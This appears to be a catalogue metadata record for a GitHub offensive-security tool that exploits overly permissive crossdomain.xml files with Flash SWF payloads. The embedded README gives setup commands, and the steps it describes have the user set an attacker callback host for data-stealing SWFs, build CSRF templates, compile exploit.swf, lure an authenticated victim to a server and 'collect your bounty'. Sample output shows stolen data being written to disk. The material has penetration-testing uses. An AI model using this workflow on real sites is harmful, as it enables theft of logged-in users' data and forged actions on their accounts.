{"id":17235331,"url":"https://github.com/sethsec/crossdomain-exploitation-framework","last_synced_at":"2026-02-10T20:32:15.892Z","repository":{"id":20430908,"uuid":"23707562","full_name":"sethsec/crossdomain-exploitation-framework","owner":"sethsec","description":"Everything you need to exploit overly permissive crossdomain.xml files","archived":false,"fork":false,"pushed_at":"2014-11-12T20:26:25.000Z","size":311,"stargazers_count":87,"open_issues_count":1,"forks_count":26,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-08-28T05:28:56.103Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"ActionScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sethsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-09-05T15:15:37.000Z","updated_at":"2025-07-11T06:25:44.000Z","dependencies_parsed_at":"2022-07-31T19:38:08.184Z","dependency_job_id":null,"html_url":"https://github.com/sethsec/crossdomain-exploitation-framework","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/sethsec/crossdomain-exploitation-framework","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sethsec%2Fcrossdomain-exploitation-framework","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sethsec%2Fcrossdomain-exploitation-framework/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sethsec%2Fcrossdomain-exploitation-framework/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sethsec%2Fcrossdomain-exploitation-framework/manifests","owne
r_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sethsec","download_url":"https://codeload.github.com/sethsec/crossdomain-exploitation-framework/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sethsec%2Fcrossdomain-exploitation-framework/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29314705,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-10T17:48:59.043Z","status":"ssl_error","status_checked_at":"2026-02-10T17:45:37.240Z","response_time":65,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-15T05:33:03.505Z","updated_at":"2026-02-10T20:32:15.874Z","avatar_url":"https://github.com/sethsec.png","language":"ActionScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"crossdomain-exploitation-framework\n==================================\n\nWhile not much of a framework just yet, everything you need to exploit overly permissive crossdomain.xml files is here.   
\n\nSupported OS\n==================================\nKali\n\nOSX\n\nDownload and Setup\n==================================\n```ShellSession\nroot@kali:~# git clone https://github.com/sethsec/crossdomain-exploitation-framework.git\nroot@kali:~# cd crossdomain-exploitation-framework\nroot@kali:~/crossdomain-exploitation-framework# ./SWF-server\n```\n\nSample Output - Installation\n==================================\n```ShellSession\nroot@kali:~/crossdomain-exploitation-framework# python SWF-server\n\n**************************************************\n*                                                *\n*              Welcome to SWF Server!            *\n*                                                *\n**************************************************\n\nIt looks like this is the first run.  We need to set up a few things...\n\n[INSTALL] Creating /opt/flex...\n[INSTALL] Downloading Flex (This is a 340MB file)...\n[INSTALL] Downloading: http://download.macromedia.com/pub/flex/sdk/flex_sdk_4.6.zip Bytes: 343973963\n[INSTALL] Extracting Flex to /opt/flex (Takes 5-20 seconds)...\n[INSTALL] Creating a self-signed SSL cert...\n[INSTALL] Copying http-crossdomain.nse to nmap scripts directory...\n[INSTALL] Time to create your own SWF file\n\n     To create your own SWF file:\n\n     1) Choose a template from ./actionscript-templates\n     2) Edit the template (or copy and then edit the template)\n         a) Specify a page on the vulnerable site that you want your victim to access:\n              Ex: http://vulnerable.com/account/settings\n         b) For data stealing SWFs, specify your attacker callback URL:\n              Ex: http://attacker/, https://192.168.0.100, or https://www.attacker.com/\n         c) For CSRF SWFs, modify the ActionScript to extract the information you need\n     3) Compile the ActionScript file and drop the SWF to the ./webroot directory (exploit.swf)\n         a) /opt/flex/bin/mxmlc ./actionscript-templates/\u003ctemplate\u003e.as --output 
./webroot/exploit.swf\n\n     4) Re-run ./SWF-server\n\nroot@kali:~/crossdomain-exploitation-framework#\n```\n\nSample Output - SWF creation\n==================================\n```ShellSession\nroot@kali:~/crossdomain-exploitation-framework# ls -l actionscript-templates/\ntotal 24\n-rw-r--r-- 1 501 staff 1952 Sep 28 17:53 CSRF.as\n-rw-r--r-- 1 501 staff 3247 Sep 28 17:53 ExtractCSRFnonceAndSecondItemThenMakePOSTrequest.as\n-rw-r--r-- 1 501 staff 2408 Sep 28 17:53 ExtractCSRFnonceChangeEmailAddress.as\n-rw-r--r-- 1 501 staff 2734 Sep 28 17:53 ExtractCSRFnonceThenMakePOSTrequest.as\n-rw-r--r-- 1 501 staff  985 Oct 10 16:08 README.md\n-rw-r--r-- 1 501 staff 1317 Oct 10 16:10 StealData.as\nroot@kali:~/crossdomain-exploitation-framework/# vi actionscript-templates/StealData.as \nroot@kali:~/crossdomain-exploitation-framework/# /opt/flex/bin/mxmlc actionscript-templates/StealData.as --output /root/crossdomain-exploitation-framework/webroot/exploit.swf\nLoading configuration file /opt/flex/frameworks/flex-config.xml\n/root/crossdomain-exploitation-framework/actionscript-templates/StealData.as: Warning: This compilation unit did not have a factoryClass specified in Frame metadata to load the configured runtime shared libraries. To compile without runtime shared libraries either set the -static-link-runtime-shared-libraries option to true or remove the -runtime-shared-libraries option.\n\n/root/crossdomain-exploitation-framework/webroot/exploit.swf (1085 bytes)\n```\n\nSample Output - Execution\n==================================\n\nOnce you have compiled your SWF and saved it in the web root, you should run SWF-server:\n\n```ShellSession\nroot@kali:~/crossdomain-exploitation-framework# ./SWF-server \n\n**************************************************\n*                                                *\n*              Welcome to SWF Server!            
*\n*                                                *\n**************************************************\n\n\n\n      [SWF-Server] Listening on 443/tcp\n      [SWF-Server] Document Root: /root/crossdomain-exploitation-framework/webroot\n      [SWF-Server] Version:       0.9.3\n      [SWF-Server] Use \u003cCtrl-C\u003e to stop\n\n\n Step #1) Hope that your victim is authenticated with the vulnerable site\n Step #2) Convince your victim to arrive at https://\u003cthis-server\u003e/index.html\n Step #3) Collect your bounty at ./bounty/\n\n\n172.16.214.1 - - [13/Oct/2014 15:39:41] \"GET /index.html HTTP/1.1\" 200 -\n172.16.214.1 - - [13/Oct/2014 15:39:41] \"GET /exploit.swf HTTP/1.1\" 200 -\n\n*  New bounty file written to disk: \n*  /root/crossdomain-exploitation-framework/bounty/bounty-172.16.214.1-1413229183.71.txt  \n\n172.16.214.1 - - [13/Oct/2014 15:39:43] \"POST / HTTP/1.1\" 200 -\n\n ```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsethsec%2Fcrossdomain-exploitation-framework","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsethsec%2Fcrossdomain-exploitation-framework","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsethsec%2Fcrossdomain-exploitation-framework/lists"}